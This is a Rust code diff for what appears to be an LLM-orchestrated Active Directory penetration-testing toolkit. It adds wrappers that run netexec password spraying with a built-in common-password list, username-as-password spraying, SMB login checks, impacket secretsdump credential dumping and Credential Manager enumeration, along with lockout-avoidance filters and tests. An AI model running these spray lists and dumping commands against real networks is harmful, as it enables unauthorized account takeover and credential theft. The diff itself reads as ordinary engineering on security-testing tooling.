+ assert_eq!(cap.pfx_basename, "./MEMBER1.pfx");
+ }
+
+ #[test]
+ fn extract_pfx_capture_returns_none_without_pfx_marker() {
+ let log = "[*] (SMB): Authenticating against ... 
CONTOSO/DC01$@192.168.58.20 SUCCEED\n[*] auth complete";
+ assert!(super::extract_pfx_capture_from_log(log).is_none());
+ }
+
+ #[test]
+ fn parse_relayed_user_handles_domain_user_dollar_at_ip() {
+ assert_eq!(
+ super::parse_relayed_user("blah CONTOSO/DC01$@192.168.58.20 SUCCEED"),
+ Some("DC01$".to_string())
+ );
+ assert_eq!(
+ super::parse_relayed_user("(SMB): Authenticating CONTOSO/jdoe@192.168.58.10"),
+ Some("jdoe".to_string())
+ );
+ }
+
+ #[test]
+ fn parse_relayed_user_returns_none_when_no_user() {
+ // Lines without a `domain/user@host` shape: no `@` at all, or an `@`
+ // with no preceding slash.
+ assert_eq!(super::parse_relayed_user("[*] Connection to host"), None);
+ assert_eq!(super::parse_relayed_user("user@host"), None); // no slash
+ }
+
 #[tokio::test]
 async fn ntlmrelayx_multirelay_with_targets_file() {
 mock::push(mock::success());
diff --git a/ares-tools/src/concurrency.rs b/ares-tools/src/concurrency.rs
new file mode 100644
index 00000000..6bb0ba61
--- /dev/null
+++ b/ares-tools/src/concurrency.rs
@@ -0,0 +1,88 @@
+//! Global concurrency caps for memory-heavy tools.
+//!
+//! `netexec spider_plus` (used by `smbclient_spider` and `sysvol_script_search`)
+//! enumerates SMB share trees recursively and holds the file metadata in RAM
+//! across the walk. Each invocation costs ~100–150 MB resident; without a cap,
+//! 60+ concurrent dispatches blew the EC2 cgroup to 6–9 GB and OOM-killed the
+//! orchestrator (op-20260502-013857, see `bug_orch_oom_spider_plus.md`).
+//!
+//! This module provides a process-wide async semaphore for those tools.
+//! Both the worker `tool_executor` path and the orchestrator's
+//! `LocalToolDispatcher` route through `ares_tools::dispatch`, so a single
+//! cap here covers both.
+
+use std::sync::LazyLock;
+
+use tokio::sync::{Semaphore, SemaphorePermit};
+use tracing::debug;
+
+/// Default number of concurrent spider_plus dispatches before subsequent calls
+/// queue. Picked to keep peak RSS under ~1 GB (4 × ~150 MB) on a t3.medium
+/// while still allowing parallelism across multiple SMB targets.
+pub const DEFAULT_SPIDER_PLUS_CONCURRENCY: usize = 4;
+
+/// Override via `ARES_SPIDER_PLUS_CONCURRENCY=<n>`. Values <1 are ignored.
+const SPIDER_PLUS_ENV: &str = "ARES_SPIDER_PLUS_CONCURRENCY";
+
+static SPIDER_PLUS_PERMITS: LazyLock<Semaphore> = LazyLock::new(|| {
+ let cap = std::env::var(SPIDER_PLUS_ENV)
+ .ok()
+ .and_then(|s| s.parse::<usize>().ok())
+ .filter(|&n| n > 0)
+ .unwrap_or(DEFAULT_SPIDER_PLUS_CONCURRENCY);
+ Semaphore::new(cap)
+});
+
+/// Tools whose implementation invokes `netexec ... -M spider_plus`. Adding a
+/// new spider_plus-backed tool? List it here so it shares the cap.
+pub fn is_spider_plus_tool(tool_name: &str) -> bool {
+ matches!(tool_name, "smbclient_spider" | "sysvol_script_search")
+}
+
+/// Acquire a permit for a spider_plus dispatch. The returned permit is held
+/// for the lifetime of the tool execution; drop releases it for the next
+/// queued call.
+///
+/// `acquire()` only fails if the semaphore is closed, which never happens in
+/// our static initialization, so we treat it as fatal if observed.
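+///
+/// Illustrative call pattern (hypothetical caller, not part of this module):
+///
+/// ```ignore
+/// let _permit = acquire_spider_plus_permit().await;
+/// // run the spider_plus-backed netexec invocation here;
+/// // dropping `_permit` releases the slot to the next queued caller
+/// ```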
+pub async fn acquire_spider_plus_permit() -> SemaphorePermit<'static> { + if SPIDER_PLUS_PERMITS.available_permits() == 0 { + debug!("spider_plus concurrency cap reached, queueing dispatch"); + } + SPIDER_PLUS_PERMITS + .acquire() + .await + .expect("spider_plus semaphore unexpectedly closed") +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn detects_known_spider_plus_tools() { + assert!(is_spider_plus_tool("smbclient_spider")); + assert!(is_spider_plus_tool("sysvol_script_search")); + } + + #[test] + fn ignores_non_spider_tools() { + assert!(!is_spider_plus_tool("nmap_scan")); + assert!(!is_spider_plus_tool("secretsdump")); + assert!(!is_spider_plus_tool("")); + } + + #[tokio::test] + async fn permit_serializes_excess_callers() { + // Sanity check that the global semaphore actually blocks past the cap. + // We can't override the singleton mid-test, but we can verify that + // available_permits decreases when we hold one. + let initial = SPIDER_PLUS_PERMITS.available_permits(); + let permit = acquire_spider_plus_permit().await; + let after_acquire = SPIDER_PLUS_PERMITS.available_permits(); + assert_eq!(after_acquire, initial.saturating_sub(1)); + drop(permit); + let after_drop = SPIDER_PLUS_PERMITS.available_permits(); + assert_eq!(after_drop, initial); + } +} diff --git a/ares-tools/src/credential_access/kerberos.rs b/ares-tools/src/credential_access/kerberos.rs index 23272dec..2ca135b8 100644 --- a/ares-tools/src/credential_access/kerberos.rs +++ b/ares-tools/src/credential_access/kerberos.rs @@ -146,6 +146,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- kerberoast --- + #[test] fn kerberoast_target_format() { let domain = "contoso.local"; @@ -195,6 +197,8 @@ mod tests { assert!(required_str(&args, "dc_ip").is_err()); } + // --- asrep_roast --- + #[test] fn asrep_roast_authenticated_format() { let domain = "contoso.local"; @@ -245,6 +249,8 @@ mod tests { assert_eq!(users_file, Some("/tmp/users.txt")); } + // --- DEFAULT_AD_USERNAMES --- + #[test] fn default_ad_usernames_is_non_empty() { assert!(!super::DEFAULT_AD_USERNAMES.is_empty()); @@ -260,6 +266,8 @@ mod tests { assert!(super::DEFAULT_AD_USERNAMES.contains("krbtgt")); } + // --- kerberos_user_enum_noauth --- + #[test] fn kerberos_user_enum_requires_domain() { let args = json!({"dc_ip": "192.168.58.1"}); @@ -301,6 +309,8 @@ mod tests { assert!(optional_str(&args, "users_file").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credential_access/misc.rs b/ares-tools/src/credential_access/misc.rs index 23b6d1e4..cb6b2765 100644 --- a/ares-tools/src/credential_access/misc.rs +++ b/ares-tools/src/credential_access/misc.rs @@ -3,6 +3,7 @@ //! password policy, password spray, username-as-password, credman, autologon). use anyhow::Result; +use ares_core::models::is_always_disabled_account; use serde_json::Value; use crate::args::{optional_bool, optional_i64, optional_str, required_str}; @@ -10,6 +11,42 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Read a caller-supplied users wordlist and return a sanitized temp-file path +/// with AD built-in always-disabled accounts (Guest, krbtgt, DefaultAccount, +/// WDAGUtilityAccount) stripped. Returns `(sanitized_path, owns_temp)` where +/// `owns_temp` indicates the caller must delete the path on exit. 
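+///
+/// Illustrative usage (hypothetical caller):
+///
+/// ```ignore
+/// let (path, owns) = sanitize_spray_userlist("/tmp/users.txt");
+/// // ... spray against `path` ...
+/// if owns {
+///     let _ = std::fs::remove_file(&path);
+/// }
+/// ```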
+///
+/// If the file can't be read or no entries are filtered, the original path is
+/// returned unchanged so callers don't pay the rewrite cost.
+fn sanitize_spray_userlist(users_file: &str) -> (String, bool) {
+ let Ok(contents) = std::fs::read_to_string(users_file) else {
+ return (users_file.to_string(), false);
+ };
+ let mut filtered_any = false;
+ let kept: Vec<&str> = contents
+ .lines()
+ .filter(|line| {
+ let user = line.trim();
+ if user.is_empty() {
+ return true;
+ }
+ if is_always_disabled_account(user) {
+ filtered_any = true;
+ return false;
+ }
+ true
+ })
+ .collect();
+ if !filtered_any {
+ return (users_file.to_string(), false);
+ }
+ let tmp = format!("/tmp/spray_users_filtered_{}.txt", std::process::id());
+ if std::fs::write(&tmp, kept.join("\n")).is_err() {
+ return (users_file.to_string(), false);
+ }
+ (tmp, true)
+}
+
 /// Minimum jitter (seconds) between spray attempts when caller does not
 /// supply `delay_seconds`. Keeps at least a small gap between authentication
 /// attempts so logon spikes do not all land in the same observation window.
@@ -50,7 +87,31 @@ pub async fn lsassy(args: &Value) -> Result<ToolOutput> {
 cmd.timeout_secs(120).execute().await
 }
 
-/// Check for admin access on targets via `netexec smb --admin-status`.
+/// Check a single credential against SMB on a target via `netexec smb`.
+///
+/// Returns standard netexec output — look for `[+]` (valid cred) and
+/// `(Pwn3d!)` (local admin).
+pub async fn smb_login_check(args: &Value) -> Result<ToolOutput> {
+ let target = required_str(args, "target")?;
+ let username = required_str(args, "username")?;
+ let password = required_str(args, "password")?;
+ let domain = required_str(args, "domain")?;
+
+ let cred_args = credentials::netexec_creds(Some(username), Some(password), None, Some(domain));
+
+ CommandBuilder::new("netexec")
+ .arg("smb")
+ .arg(target)
+ .args(cred_args)
+ .timeout_secs(60)
+ .execute()
+ .await
+}
+
+/// Check for admin access on targets via `netexec smb`.
+///
+/// netexec automatically reports `(Pwn3d!)` in its output when the
+/// credential has local admin access — no extra flag needed.
 pub async fn domain_admin_checker(args: &Value) -> Result<ToolOutput> {
 let targets = required_str(args, "targets")?;
 let username = optional_str(args, "username");
@@ -64,7 +125,6 @@
 .arg("smb")
 .arg(targets)
 .args(cred_args)
- .arg("--admin-status")
 .timeout_secs(120)
 .execute()
 .await
@@ -140,14 +200,20 @@ pub async fn laps_dump(args: &Value) -> Result<ToolOutput> {
 }
 
 /// Search for user descriptions containing credentials via `ldapsearch`.
+///
+/// `domain` controls the base DN (the partition being searched).
+/// `bind_domain` (optional) overrides the domain in the bind DN
+/// (`user@bind_domain`). Use when the credential belongs to a different
+/// domain than the one being queried. Defaults to `domain`.
 pub async fn ldap_search_descriptions(args: &Value) -> Result<ToolOutput> {
 let target = required_str(args, "target")?;
- let username = required_str(args, "username")?;
- let password = required_str(args, "password")?;
 let domain = required_str(args, "domain")?;
+ let username = optional_str(args, "username");
+ let password = optional_str(args, "password");
+ let bind_domain = optional_str(args, "bind_domain");
 let base_dn = optional_str(args, "base_dn");
+ let ticket_path = optional_str(args, "ticket_path");
 
- // Build base DN from domain if not explicitly provided.
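+ // Build the base DN from the domain when not explicitly provided,
+ // e.g. contoso.local -> "DC=contoso,DC=local".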
 let computed_base_dn = match base_dn {
 Some(dn) => dn.to_string(),
 None => domain
@@ -157,20 +223,27 @@ pub async fn ldap_search_descriptions(args: &Value) -> Result<ToolOutput> {
 .join(","),
 };
 
- let bind_dn = format!("{username}@{domain}");
 let ldap_uri = format!("ldap://{target}");
 
- CommandBuilder::new("ldapsearch")
- .arg("-x")
+ let mut cmd = CommandBuilder::new("ldapsearch")
 .flag("-H", &ldap_uri)
- .flag("-D", &bind_dn)
- .flag("-w", password)
- .flag("-b", &computed_base_dn)
+ .timeout_secs(120);
+
+ if let Some(ccache) = ticket_path {
+ cmd = cmd.env("KRB5CCNAME", ccache).arg("-Y").arg("GSSAPI");
+ } else {
+ let u = username.ok_or_else(|| anyhow::anyhow!("missing required arg: username"))?;
+ let p = password.ok_or_else(|| anyhow::anyhow!("missing required arg: password"))?;
+ let auth_domain = bind_domain.unwrap_or(domain);
+ let bind_dn = format!("{u}@{auth_domain}");
+ cmd = cmd.arg("-x").flag("-D", &bind_dn).flag("-w", p);
+ }
+
+ cmd.flag("-b", &computed_base_dn)
 .arg("(&(objectClass=user)(description=*))")
 .arg("sAMAccountName")
 .arg("description")
 .arg("userPrincipalName")
- .timeout_secs(120)
 .execute()
 .await
 }
@@ -374,7 +447,8 @@ pub async fn password_spray(args: &Value) -> Result<ToolOutput> {
 let target = required_str(args, "target")?;
 let users_file = optional_str(args, "users_file");
- let password = required_str(args, "password")?;
+ let password = optional_str(args, "password");
+ let use_common_passwords = optional_bool(args, "use_common_passwords").unwrap_or(false);
 let domain = required_str(args, "domain")?;
 let delay_seconds = optional_i64(args, "delay_seconds");
 let lockout_threshold = optional_i64(args, "lockout_threshold");
@@ -387,17 +461,33 @@
 return Ok(refusal);
 }
 
- // Use provided file or generate a default wordlist
+ // Use provided file or generate a default wordlist. When the caller
+ // supplies a users_file, strip AD built-in always-disabled accounts so
+ // we don't burn badPwdCount budget on Guest et al.
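+ // e.g. a caller list of "Administrator\nGuest\njdoe" is rewritten to
+ // "Administrator\njdoe" before netexec ever sees it.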
 let tmp_file;
+ let mut owns_filtered = false;
 let wordlist_path = if let Some(uf) = users_file {
- uf.to_string()
+ let (path, owns) = sanitize_spray_userlist(uf);
+ owns_filtered = owns;
+ path
 } else {
 tmp_file = format!("/tmp/spray_pw_{}.txt", std::process::id());
 std::fs::write(&tmp_file, DEFAULT_SPRAY_USERNAMES)?;
 tmp_file
 };
 
- let cred_args = credentials::netexec_creds(None, Some(password), None, Some(domain));
+ let tmp_password_file;
+ let password_arg = match (password, use_common_passwords) {
+ (Some(p), _) => p.to_string(),
+ (None, true) => {
+ tmp_password_file = format!("/tmp/spray_pwlist_{}.txt", std::process::id());
+ std::fs::write(&tmp_password_file, DEFAULT_SPRAY_PASSWORDS)?;
+ tmp_password_file
+ }
+ (None, false) => anyhow::bail!(
+ "password_spray requires either 'password' or 'use_common_passwords=true'"
+ ),
+ };
 
 let jitter = delay_seconds
 .unwrap_or(SPRAY_DEFAULT_JITTER_SECS)
@@ -407,7 +497,8 @@
 .arg("smb")
 .arg(target)
 .flag("-u", &wordlist_path)
- .args(cred_args)
+ .flag("-p", &password_arg)
+ .flag("-d", domain)
 .arg("--continue-on-success")
 .flag("--jitter", &jitter)
 .timeout_secs(300)
@@ -415,9 +506,12 @@
 .await;
 
 // Clean up temp file if we created one
- if users_file.is_none() {
+ if users_file.is_none() || owns_filtered {
 let _ = std::fs::remove_file(&wordlist_path);
 }
+ if password.is_none() && use_common_passwords {
+ let _ = std::fs::remove_file(&password_arg);
+ }
 
 result
 }
@@ -468,8 +562,12 @@ fn spray_refusal(message: String) -> ToolOutput {
 }
 
 /// Common AD usernames for fallback when no users_file is provided.
+///
+/// `guest`, `defaultaccount`, `wdagutilityaccount`, `krbtgt` are intentionally
+/// excluded — they ship with the `ACCOUNTDISABLE` bit set in
+/// `userAccountControl`, so spraying them never succeeds and just bumps
+/// badPwdCount on shared lockout policies.
 const DEFAULT_SPRAY_USERNAMES: &str = "\
-Administrator\nadmin\nguest\n\
+Administrator\nadmin\n\
 sql_svc\nsvc_sql\nsqlservice\nsvc_mssql\n\
 svc_backup\nbackup\n\
 svc_web\nwebservice\n\
@@ -491,22 +589,62 @@
 sql_admin\ndb_admin\n\
 webadmin\nnetadmin\n\
 helpdesk\nsupport\nservice\n";
 
+/// Common AD passwords for fallback low-and-slow spraying when the orchestrator
+/// explicitly requests a common-password pass instead of a single known value.
+const DEFAULT_SPRAY_PASSWORDS: &str = "\
+Password123!\n\
+Welcome1\n\
+Welcome123\n\
+Summer2024!\n\
+Summer2025!\n\
+Winter2024!\n\
+Winter2025!\n\
+Spring2025!\n\
+Autumn2025!\n\
+Company123!\n\
+Changeme123!\n\
+P@ssw0rd\n\
+P@ssw0rd!\n\
+Password1\n";
+
 /// Test each username as its own password via `netexec smb --no-bruteforce`.
+///
+/// `excluded_users` (optional) is a comma- or whitespace-separated list of
+/// usernames the orchestrator already saw locked out. They are dropped from
+/// the wordlist before netexec runs so a re-spray doesn't keep pinging an
+/// already-locked principal (each ping bumps badPwdCount and prolongs the
+/// AD lockout window).
 pub async fn username_as_password(args: &Value) -> Result<ToolOutput> {
 let target = required_str(args, "target")?;
 let users_file = optional_str(args, "users_file");
 let domain = required_str(args, "domain")?;
+ let excluded_users = optional_str(args, "excluded_users").unwrap_or("");
 
- // Use provided file or generate a default wordlist
+ // Use provided file or generate a default wordlist. 
Caller-supplied
+ // wordlists are filtered to drop AD built-in always-disabled accounts so
+ // we don't waste badPwdCount budget on Guest et al.
 let tmp_file;
- let wordlist_path = if let Some(uf) = users_file {
- uf.to_string()
+ let mut owns_filtered = false;
+ let mut wordlist_path = if let Some(uf) = users_file {
+ let (path, owns) = sanitize_spray_userlist(uf);
+ owns_filtered = owns;
+ path
 } else {
 tmp_file = format!("/tmp/spray_users_{}.txt", std::process::id());
 std::fs::write(&tmp_file, DEFAULT_SPRAY_USERNAMES)?;
 tmp_file
 };
 
+ // Drop any usernames the orchestrator already observed locked out.
+ let (after_excl, owns_excluded) = drop_excluded_users(&wordlist_path, excluded_users);
+ if owns_excluded {
+ if owns_filtered {
+ let _ = std::fs::remove_file(&wordlist_path);
+ }
+ wordlist_path = after_excl;
+ owns_filtered = true;
+ }
+
 let result = CommandBuilder::new("netexec")
 .arg("smb")
 .arg(target)
@@ -519,14 +657,61 @@ pub async fn username_as_password(args: &Value) -> Result<ToolOutput> {
 .execute()
 .await;
 
- // Clean up temp file if we created one
+ // Clean up temp file if we created one (default fallback or filtered copy)
+ if users_file.is_none() || owns_filtered {
 let _ = std::fs::remove_file(&wordlist_path);
 }
 
 result
 }
 
+/// Drop usernames listed in `excluded_users` (comma/whitespace separated)
+/// from the wordlist at `path`. Returns `(path_to_use, owns_new_file)`.
+/// Case-insensitive match; preserves original line order. If `excluded_users`
+/// is empty or no entries match, returns the input path unchanged.
+fn drop_excluded_users(path: &str, excluded_users: &str) -> (String, bool) {
+ let excluded: std::collections::HashSet<String> = excluded_users
+ .split(|c: char| c == ',' || c.is_whitespace())
+ .filter(|s| !s.is_empty())
+ .map(|s| s.to_lowercase())
+ .collect();
+ if excluded.is_empty() {
+ return (path.to_string(), false);
+ }
+ let Ok(contents) = std::fs::read_to_string(path) else {
+ return (path.to_string(), false);
+ };
+ let mut filtered_any = false;
+ let kept: Vec<&str> = contents
+ .lines()
+ .filter(|line| {
+ let trimmed = line.trim();
+ if trimmed.is_empty() {
+ return true;
+ }
+ if excluded.contains(&trimmed.to_lowercase()) {
+ filtered_any = true;
+ return false;
+ }
+ true
+ })
+ .collect();
+ if !filtered_any {
+ return (path.to_string(), false);
+ }
+ // Make the temp filename unique per call: parallel callers (and parallel
+ // unit tests) share the process and would otherwise overwrite each other.
+ let nanos = std::time::SystemTime::now()
+ .duration_since(std::time::UNIX_EPOCH)
+ .map(|d| d.as_nanos())
+ .unwrap_or(0);
+ let tmp = format!("/tmp/spray_users_excl_{}_{}.txt", std::process::id(), nanos);
+ if std::fs::write(&tmp, kept.join("\n")).is_err() {
+ return (path.to_string(), false);
+ }
+ (tmp, true)
+}
+
 /// Enumerate Credential Manager entries via `netexec smb -x "cmdkey /list"`.
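+/// Illustrative: for target 192.168.58.10 this runs roughly
+/// `netexec smb 192.168.58.10 -u <user> -p <pass> -d <domain> -x "cmdkey /list"`.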
pub async fn check_credman_entries(args: &Value) -> Result<ToolOutput> {
 let target = required_str(args, "target")?;
@@ -573,6 +758,8 @@ mod tests {
 use crate::credentials;
 use serde_json::json;
 
+ // --- lsassy hash formatting ---
+
 #[test]
 fn lsassy_hash_without_colon_gets_prefix() {
 let hash = "aabbccdd";
@@ -623,6 +810,8 @@
 assert!(optional_str(&args, "method").is_none());
 }
 
+ // --- ldap_search_descriptions ---
+
 #[test]
 fn base_dn_computation_from_domain() {
 let domain = "contoso.local";
@@ -689,6 +878,8 @@
 assert!(required_str(&args, "domain").is_ok());
 }
 
+ // --- netexec_creds helper ---
+
 #[test]
 fn netexec_creds_for_domain_admin_checker() {
 let cred_args =
@@ -719,6 +910,8 @@
 assert!(required_str(&args, "targets").is_err());
 }
 
+ // --- gpp_password_finder ---
+
 #[test]
 fn gpp_password_finder_all_required() {
 let args = json!({
@@ -733,6 +926,8 @@
 assert!(required_str(&args, "domain").is_ok());
 }
 
+ // --- DEFAULT_SPRAY_USERNAMES ---
+
 #[test]
 fn default_spray_usernames_is_non_empty() {
 assert!(!super::DEFAULT_SPRAY_USERNAMES.is_empty());
@@ -749,6 +944,23 @@
 assert!(super::DEFAULT_SPRAY_USERNAMES.contains("svc_backup"));
 }
 
+ #[test]
+ fn default_spray_usernames_excludes_disabled_builtins() {
+ let entries: Vec<&str> = super::DEFAULT_SPRAY_USERNAMES
+ .lines()
+ .map(|l| l.trim())
+ .filter(|l| !l.is_empty())
+ .collect();
+ for disabled in ["guest", "krbtgt", "defaultaccount", "wdagutilityaccount"] {
+ assert!(
+ !entries.iter().any(|e| e.eq_ignore_ascii_case(disabled)),
+ "disabled built-in {disabled} must not appear in default spray wordlist"
+ );
+ }
+ }
+
+ // --- password_spray ---
+
 #[test]
 fn password_spray_delay_seconds_parsing() {
 let args = json!({
@@ -788,6 +1000,8 @@
 assert!(required_str(&args, "domain").is_err());
 }
 
+ // --- ntds_dit_extract ---
+
 #[test]
 fn ntds_dit_extract_auth_with_password() {
 let (auth_string, extra_args) = credentials::impacket_auth(
@@ -814,6 +1028,8 @@
 assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]);
 }
 
+ // --- smbclient_spider ---
+
 #[test]
 fn smbclient_spider_optional_pattern() {
 let args = json!({
@@ -855,6 +1071,8 @@
 );
 }
 
+ // --- check_credman_entries / check_autologon_registry ---
+
 #[test]
 fn credman_requires_all_fields() {
 let args = json!({
@@ -881,6 +1099,8 @@
 assert_eq!(cred_args[5], "contoso.local");
 }
 
+ // --- username_as_password ---
+
 #[test]
 fn username_as_password_requires_target() {
 let args = json!({"domain": "contoso.local"});
@@ -903,6 +1123,8 @@
 assert_eq!(optional_str(&args, "users_file"), Some("/tmp/myusers.txt"));
 }
 
+ // --- mock executor tests ---
+
 use crate::executor::mock;
 
 #[tokio::test]
@@ -933,6 +1155,16 @@
 assert!(super::lsassy(&args).await.is_ok());
 }
 
+ #[tokio::test]
+ async fn smb_login_check_executes() {
+ mock::push(mock::success());
+ let args = json!({
+ "target": "192.168.58.10", "username": "localuser",
+ "password": "localuser", "domain": "contoso.local"
+ });
+ assert!(super::smb_login_check(&args).await.is_ok());
+ }
+
 #[tokio::test]
 async fn domain_admin_checker_executes() {
 mock::push(mock::success());
@@ -1150,6 +1382,78 @@
 assert!(super::check_spray_budget(Some(0), 100, false).is_none());
 }
 
+ // --- sanitize_spray_userlist ---
+
+ #[test]
+ fn sanitize_spray_userlist_strips_disabled_accounts() {
+ let pid = std::process::id();
+ let src = format!("/tmp/sanitize_src_{pid}.txt");
+ std::fs::write(
+ &src,
+ 
"Administrator\nGuest\nkrbtgt\njdoe\nDefaultAccount\nWDAGUtilityAccount\nsvc_sql\n", + ) + .unwrap(); + + let (path, owns) = super::sanitize_spray_userlist(&src); + assert!(owns, "filtered list should be in a freshly owned temp file"); + assert_ne!( + path, src, + "owned filter should not return the original path" + ); + + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("Administrator")); + assert!(filtered.contains("jdoe")); + assert!(filtered.contains("svc_sql")); + for disabled in ["Guest", "krbtgt", "DefaultAccount", "WDAGUtilityAccount"] { + assert!( + !filtered.lines().any(|l| l.trim() == disabled), + "{disabled} should be filtered out" + ); + } + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + + #[test] + fn sanitize_spray_userlist_passes_through_when_clean() { + let pid = std::process::id(); + let src = format!("/tmp/sanitize_clean_{pid}.txt"); + std::fs::write(&src, "Administrator\njdoe\nsvc_sql\n").unwrap(); + + let (path, owns) = super::sanitize_spray_userlist(&src); + assert!(!owns, "clean list should not be rewritten"); + assert_eq!(path, src, "clean list should return original path"); + + let _ = std::fs::remove_file(&src); + } + + #[test] + fn sanitize_spray_userlist_handles_missing_file() { + let path = "/tmp/sanitize_missing_does_not_exist.txt"; + let _ = std::fs::remove_file(path); + let (returned, owns) = super::sanitize_spray_userlist(path); + assert!(!owns); + assert_eq!(returned, path); + } + + #[test] + fn sanitize_spray_userlist_case_insensitive() { + let pid = std::process::id(); + let src = format!("/tmp/sanitize_case_{pid}.txt"); + std::fs::write(&src, "GUEST\nguest\nGuest\nadmin\n").unwrap(); + + let (path, owns) = super::sanitize_spray_userlist(&src); + assert!(owns); + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("admin")); + assert!(!filtered.to_lowercase().contains("guest")); + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + #[tokio::test] async fn username_as_password_with_file_executes() { mock::push(mock::success()); @@ -1160,6 +1464,69 @@ mod tests { assert!(super::username_as_password(&args).await.is_ok()); } + #[test] + fn drop_excluded_users_strips_listed_entries() { + let pid = std::process::id(); + let src = format!("/tmp/excl_src_{pid}.txt"); + std::fs::write(&src, "Administrator\ntestuser1\ntestuser2\nguest\n").unwrap(); + + let (path, owns) = super::drop_excluded_users(&src, "testuser1, guest"); + assert!(owns); + assert_ne!(path, src); + let filtered = std::fs::read_to_string(&path).unwrap(); + assert!(filtered.contains("Administrator")); + assert!(filtered.contains("testuser2")); + assert!(!filtered + .lines() + .any(|l| l.trim().eq_ignore_ascii_case("testuser1"))); + assert!(!filtered.lines().any(|l| l.trim().eq_ignore_ascii_case("guest"))); + + let _ = std::fs::remove_file(&src); + let _ = std::fs::remove_file(&path); + } + + #[test] + fn drop_excluded_users_empty_list_passes_through() { + let pid = std::process::id(); + let src = format!("/tmp/excl_empty_{pid}.txt"); + std::fs::write(&src, "Administrator\ntestuser1\n").unwrap(); + + let (path, owns) = super::drop_excluded_users(&src, ""); + assert!(!owns); + assert_eq!(path, src); + + let _ = std::fs::remove_file(&src); + } + + #[test] + fn drop_excluded_users_no_matches_passes_through() { + let pid = std::process::id(); + let src = format!("/tmp/excl_nomatch_{pid}.txt"); + std::fs::write(&src, "Administrator\ntestuser1\n").unwrap(); + + let (path, 
owns) = super::drop_excluded_users(&src, "testuser2,testuser3");
+ assert!(!owns);
+ assert_eq!(path, src);
+
+ let _ = std::fs::remove_file(&src);
+ }
+
+ #[test]
+ fn drop_excluded_users_case_insensitive() {
+ let pid = std::process::id();
+ let src = format!("/tmp/excl_case_{pid}.txt");
+ std::fs::write(&src, "TESTUSER1\ntestuser1\nadmin\n").unwrap();
+
+ let (path, owns) = super::drop_excluded_users(&src, "testuser1");
+ assert!(owns);
+ let filtered = std::fs::read_to_string(&path).unwrap();
+ assert!(filtered.contains("admin"));
+ assert!(!filtered.to_lowercase().contains("testuser1"));
+
+ let _ = std::fs::remove_file(&src);
+ let _ = std::fs::remove_file(&path);
+ }
+
 #[tokio::test]
 async fn check_credman_entries_executes() {
 mock::push(mock::success());
diff --git a/ares-tools/src/credential_access/secretsdump.rs b/ares-tools/src/credential_access/secretsdump.rs
index 5b2d1590..b55b505c 100644
--- a/ares-tools/src/credential_access/secretsdump.rs
+++ b/ares-tools/src/credential_access/secretsdump.rs
@@ -18,16 +18,30 @@ pub async fn secretsdump(args: &Value) -> Result<ToolOutput> {
 let dc_ip = optional_str(args, "dc_ip");
 let use_kerberos = optional_bool(args, "no_pass").unwrap_or(false);
 let ticket_path = optional_str(args, "ticket_path");
+ let just_dc_user = optional_str(args, "just_dc_user");
+ let use_vss = optional_bool(args, "use_vss").unwrap_or(false);
 let timeout_minutes = optional_i64(args, "timeout_minutes");
 let timeout_secs = timeout_minutes.map(|m| (m * 60) as u64).unwrap_or(180);
 
+ if !use_kerberos && password.is_none() && hash.is_none() {
+ anyhow::bail!(
+ "secretsdump requires password, hash, or no_pass+ticket_path. \
+ None were provided for {username}@{} on {target} — credentials \
+ must be present in operation state for the (username, domain) pair, \
+ or the LLM must call this with no_pass=true and a valid Kerberos ticket. \
+ Refusing to run because impacket would call getpass() and crash on no-TTY.",
+ domain.unwrap_or("(no domain)")
+ );
+ }
+
 let (auth_string, extra_args) =
 credentials::impacket_auth(domain, username, password, hash, target);
 
 let mut cmd = CommandBuilder::new("impacket-secretsdump");
 cmd = cmd.flag_opt("-dc-ip", dc_ip);
+ cmd = cmd.flag_opt("-just-dc-user", just_dc_user);
 
 if use_kerberos {
 cmd = cmd.arg("-k").arg("-no-pass");
@@ -38,6 +52,10 @@ pub async fn secretsdump(args: &Value) -> Result<ToolOutput> {
 cmd = cmd.args(extra_args);
 }
 
+ if use_vss {
+ cmd = cmd.arg("-use-vss");
+ }
+
 cmd = cmd.arg(&auth_string);
 
 cmd.timeout_secs(timeout_secs).execute().await
@@ -160,6 +178,8 @@ mod tests {
 assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.2"));
 }
 
+ // --- mock executor tests ---
+
 use crate::executor::mock;
 
 #[tokio::test]
diff --git a/ares-tools/src/credentials.rs b/ares-tools/src/credentials.rs
index 8bc12d33..9a88501d 100644
--- a/ares-tools/src/credentials.rs
+++ b/ares-tools/src/credentials.rs
@@ -1,3 +1,116 @@
+use anyhow::Result;
+use serde_json::Value;
+
+/// Argument keys that hold secret material. Mirrors `CREDENTIAL_KEYS` in
+/// `ares-cli/src/worker/credential_resolver.rs` — keep in sync.
+///
+/// The LLM must never supply values for these keys; the worker resolver
+/// injects them from operation state and strips placeholders. This list is
+/// used by [`validate_arguments`] to fail dispatch loudly if a placeholder
+/// somehow survives upstream stripping.
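+///
+/// Illustrative: `{"password": "[TGT]"}` is rejected as a bracketed
+/// placeholder, while `{"password": "P@ssw0rd!"}` passes through untouched
+/// (see the tests at the bottom of this file).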
+pub const CREDENTIAL_KEYS: &[&str] = &[
+ "password",
+ "hash",
+ "hashes",
+ "nt_hash",
+ "nthash",
+ "ntlm_hash",
+ "lm_hash",
+ "aes_key",
+ "aesKey",
+ "aes256_key",
+ "ticket_path",
+ "krbtgt_hash",
+ "child_krbtgt_hash",
+ "parent_krbtgt_hash",
+ "trust_key",
+ "trust_aes_key",
+ "trust_hash",
+ "admin_hash",
+ "domain_sid",
+ "source_sid",
+ "target_sid",
+ "extra_sid",
+ "kerberos_keys",
+ "dpapi_key",
+ "pfx_password",
+ "coerce_password",
+ "coerce_hash",
+];
+
+/// Validate that no credential argument carries a placeholder/literal value.
+///
+/// Defense-in-depth backstop for the worker credential resolver. The schema
+/// strip in `ares-llm` keeps credential fields out of LLM tool calls, and
+/// the worker resolver injects real values from operation state and strips
+/// placeholders. If a placeholder still reaches dispatch, something upstream
